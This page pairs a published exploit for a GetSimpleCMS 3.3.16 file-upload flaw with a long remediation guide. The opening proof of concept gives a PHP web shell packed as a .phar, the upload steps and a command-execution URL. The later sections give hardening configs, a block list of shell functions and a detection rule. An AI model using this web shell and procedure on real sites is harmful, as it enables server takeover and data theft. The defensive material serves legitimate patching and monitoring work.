GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)

Exploit Author: CodeSecLab Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2025-04-11

# Exploit Title: GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/GetSimpleCMS/GetSimpleCMS
# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS
# Version: 3.3.16
# Tested on: Ubuntu Windows
# CVE : CVE-2021-28976

PoC-1:
1)Create a .phar file.
1. Create the PHP script: Save your code (the one you provided) in a file, say index.php: <?php echo shell_exec($_GET['cmd']); ?>
2. Write a PHP script to create the .phar file: Use the Phar class in PHP to package the index.php file into a .phar archive. Create a script named create_phar.php as follows:
<?php
try {
    // Initialize a new Phar object, name it "archive.phar"
    $phar = new Phar('archive.phar');

    // Set the stub (entry point) for the Phar file, pointing to index.php
    $phar->startBuffering();
    $phar->addFromString('index.php', file_get_contents('index.php'));
    $phar->setStub($phar->createDefaultStub('index.php'));
    $phar->stopBuffering();

    echo "Phar archive created successfully!";
} catch (Exception $e) {
    echo "Error: " . $e->getMessage();
}
3. Run the script to generate the .phar file: On your terminal (assuming you're using a system that has PHP installed), run the following command to execute the script: php create_phar.php. 
After running the script, you should find a file named archive.phar in your working directory.

2)Upload file:
1. Upload the 'archive.phar' file using the vulnerable upload functionality at http://getsimplecms/admin/upload.php. 
2. You can find the file at http://getsimplecms/data/uploads/.

3)Details:
 "Validation Mechanisms Before Patch": "File extension blacklist and MIME type blacklist were used but lacked specific filtering for 'phar' file types.",
    "Bypass Technique": "Upload a 'phar' file, as it was not included in the original blacklist, which can be treated as a PHP archive by the server for remote code execution.",
    "Request URL": "http://getsimplecms/admin/upload.php",
    "Request Method": "POST",
    "Request Parameters": {
        "file": "<Malicious File>"
    },


PoC-2:
1) LLM creates the file exploit.phar with the following contents:
malicious.php                                                                                       0000644 0000000 0000000 00000000036 00000000000 010442  0                                                                                                    ustar 00                                                                                                                                                                                                                                                       <?php system($_GET['cmd']); ?>                  

2)
1. Prepare a PHP file named 'exploit.phar' .\n
2. Send a POST request to http://getsimplecms/admin/upload.php with the 'exploit.phar' file as the 'file' parameter.\n
3. Access the uploaded file at http://getsimplecms/data/uploads/exploit.phar and execute commands by passing the 'cmd' parameter (e.g., http://getsimplecms/data/uploads/exploit.phar?cmd=id).

[Replace Your Domain Name]

GetSimpleCMS 3.3.16 — Remote Code Execution (CVE-2021-28976): Overview, Risks, and Mitigation

GetSimpleCMS 3.3.16 was affected by a vulnerability (CVE-2021-28976) allowing remote code execution (RCE) via specially crafted uploaded files that could be treated as PHP archives by the server. This article explains the high-level technical cause, the risk to affected sites, and — most importantly — robust remediation, mitigation, detection, and hardening strategies you can apply to reduce exposure.

Key facts (at a glance)

Vulnerability: Remote Code Execution (RCE) via uploaded PHP archive files.
Product: GetSimpleCMS
Affected version: 3.3.16 (and specific deployments that did not properly validate uploads).
CVE: CVE-2021-28976
Root cause: insufficient upload validation/whitelisting and server handling of archive formats that can include executable PHP stubs (e.g., phar), allowing remote execution when uploaded into a web-accessible directory.
Primary mitigation: update GetSimpleCMS to a patched release and harden upload handling and server configuration.

What happened — technical summary (non-actionable)

The vulnerability stems from how compressed/archive formats (notably formats that can embed PHP stubs) are treated when uploaded and stored within a webroot that allows script execution. If an attacker can place an archive that the server or PHP stream wrappers treat as executable or includeable, it can result in arbitrary code execution. The issue was aggravated by blacklist-only validation or weak MIME checks and by storing uploads in a directory that permits PHP execution.

Why this is dangerous

RCE is high severity: an attacker who can execute code can escalate to full site takeover, data theft, or pivot to internal networks.
Shared hosting or multi-site deployments are especially at risk when uploads are stored in publicly accessible, executable locations.
Automated scanners and malware can attempt to exploit such weaknesses at scale — rapid remediation is required.

Affected components

Any component that:

accepts file uploads into a web-accessible directory, and
does not use a strict whitelist for allowed file types, and
permits server/PHP to execute files from the upload location (e.g., PHP enabled in the uploads directory), or
does not verify or sanitize archive contents before saving.

Recommended mitigations and best practices

1) Patch/update immediately

First and foremost, update GetSimpleCMS to the latest available patch that addresses the vulnerability. Vendor patches are the most reliable fix because they remove the vulnerable code paths or add proper validation in the application layer.

2) Harden upload handling in the application

Use a strict whitelist of allowed extensions (e.g., jpg, png, gif, pdf) and MIME types instead of blacklists.
Validate MIME types with server-side file inspection (finfo) rather than relying on client-provided values.
Reject archive types that can embed executable code (unless explicitly required) and apply additional inspection for archives when necessary.
Store uploaded files outside the webroot where possible; serve them via a controlled handler that enforces authorization and content-type headers.
Generate safe, random filenames and avoid preserving original file names.

Example: secure PHP upload handler (store outside webroot)

<?php
// Safe upload handling (illustrative example — adapt for your framework)

// Configuration
$allowedMimes = ['image/jpeg', 'image/png', 'application/pdf'];
$allowedExts  = ['jpg','jpeg','png','pdf'];
$uploadDir     = __DIR__ . '/../private_uploads/'; // outside webroot

// Basic checks
if (!isset($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK) {
    http_response_code(400);
    echo 'Invalid upload';
    exit;
}

// Use finfo to validate MIME
$finfoMime = (new finfo(FILEINFO_MIME_TYPE))->file($_FILES['file']['tmp_name']);
if (!in_array($finfoMime, $allowedMimes, true)) {
    http_response_code(415);
    echo 'Disallowed file type';
    exit;
}

// Validate extension
$ext = strtolower(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION));
if (!in_array($ext, $allowedExts, true)) {
    http_response_code(415);
    echo 'Disallowed extension';
    exit;
}

// Generate a safe filename
$basename = bin2hex(random_bytes(16)) . '.' . $ext;
$destination = $uploadDir . $basename;

// Move uploaded file
if (!move_uploaded_file($_FILES['file']['tmp_name'], $destination)) {
    http_response_code(500);
    echo 'Upload failed';
    exit;
}

// Set safe permissions (no execute)
chmod($destination, 0640);

// Optional: scan the file with an antivirus/AV engine here (e.g., clamav)
echo 'Upload successful';
?>

Explanation: This code illustrates a defensive upload flow. It uses finfo to detect MIME types reliably, enforces extension and MIME whitelists, stores files outside the webroot, uses cryptographically-random filenames, and sets strict file permissions. Avoid serving files directly from the uploads directory using direct execution paths.

3) Prevent execution in upload directories (webserver configuration)

Even if application checks fail, the webserver should be configured so uploaded files cannot be executed as scripts.

For Apache (example .htaccess placed in the uploads directory):

# Disable PHP execution in this directory (works with mod_php)
<FilesMatch "\.(php|php5|phtml)$">
  Require all denied
</FilesMatch>

# Alternatively, remove handlers
RemoveHandler .php .phtml .php5
RemoveType .php .phtml .php5

Explanation: These directives deny access to PHP files (or remove PHP handlers) in the uploads directory so even if a PHP file is uploaded, it will not be executed by the server.

For Nginx (block PHP execution under /data/uploads):

location ^~ /data/uploads/ {
    # deny execution of PHP files
    location ~ \.php$ {
        return 403;
    }

    # Optionally, deny access to archives or certain extensions
    location ~* \.(phar|phar\.gz|phar\.bz2)$ {
        return 403;
    }

    # Serve static files normally
    try_files $uri =404;
}

Explanation: Nginx config above ensures that PHP files within the uploads directory will return 403 Forbidden, and blocks specific archive types from being served/executed. Adjust the path and rules to match your deployment.

4) PHP runtime hardening

Set php.ini options to reduce execution surface:
- phar.readonly = On — prevents runtime creation/modification of phar archives (helps limit attacks that rely on writing phar files).
- disable_functions = exec,passthru,shell_exec,system,popen,proc_open — remove unneeded functions.
- open_basedir — restrict PHP processes to application directories.
- allow_url_include = Off — prevent remote includes.
Consider removing or unregistering the PHAR stream wrapper if your application does not use it (server-side bootstrap):

// At application bootstrap (only if safe and tested)
if (in_array('phar', stream_get_wrappers(), true)) {
    @stream_wrapper_unregister('phar');
}

Explanation: Unregistering the phar wrapper prevents PHP from treating .phar streams as executable at runtime. Test thoroughly before deploying to production, as some libraries might rely on phar functionality.

5) Deploy detection and monitoring

Log and monitor uploads to admin endpoints (e.g., POST to admin/upload.php) with user, IP, and request metadata.
Alert on uploads of disallowed or suspicious extensions (e.g., .phar, .php within uploads) or unusually large numbers of uploads.
Scan uploads with an antivirus engine (ClamAV or enterprise AV) and/or content inspection engines.
Check webserver access logs for direct requests to uploaded artifacts that should never be requested publicly (particularly .phar or unexpected extensions).

6) Incident response guidance (if you suspect compromise)

Isolate the affected host from the network as appropriate.
Preserve logs and copies of suspicious files for analysis (hashes, timestamps, and related requests).
Check for web shells, new user accounts, scheduled tasks, or modified configuration files.
Rotate credentials for administrator accounts and any connected services (databases, API keys).
Reinstall from known-good backups or rebuild the system if full remediation is required.

Detection rules and useful heuristics (defensive)

Below are example defensive patterns you can use in monitoring, WAF, or IDS. These are intended to help detect attempts to upload or access suspicious archive/executable files — tune them to your environment to avoid false positives.

# Example defensive ModSecurity rule (conceptual)
SecRule REQUEST_URI|REQUEST_FILENAME "@rx \.(phar|phar\.gz|phar\.bz2)$" \
    "phase:1,deny,log,msg:'Blocked attempt to access PHAR archive',id:100001,severity:2"

Explanation: This is a conceptual rule for ModSecurity to detect requests targeting .phar or related names and block them. Modify and test in non-production before enabling to avoid blocking legitimate traffic.

# Simple heuristic: log POSTs to upload endpoints with file names that contain suspicious extensions
# (Implement in your application logging/monitoring pipeline)

Explanation: Monitor POST activity to administrative upload endpoints and flag any unexpected file extensions or content types.

Root cause remediation — secure development guidance

Avoid blacklists. Use strict whitelists for both file extensions and server-side-detected MIME types.
Never store user-uploaded files in directories where server-side scripts can be executed. If you must, enforce strong access control and content verification.
Avoid deserializing untrusted data. Many RCEs are rooted in unsafe handling of serialized objects or archive metadata.
Perform security code reviews on modules that accept user-supplied files and on any integration that unpacks or inspects archives.

References and further reading

Topic	Why it helps
CVE-2021-28976	Public identifier for the reported RCE affecting certain GetSimpleCMS deployments (search vendor advisories for details and patches).
PHP security hardening (php.ini options)	Guidance for settings (phar.readonly, disable_functions, open_basedir) that reduce attack surface.
Server configuration guides (Apache/Nginx)	How to disable script execution in upload directories and enforce safe content serving.

Final notes

This vulnerability demonstrates a common and recurring class of web application risk: file upload handling combined with executable server behavior. The safest approach is layered: patch the application, harden upload logic, lock down the webserver and runtime, and monitor for suspicious activity. If you're running affected versions of GetSimpleCMS, prioritize upgrading and applying the server-side mitigations described above.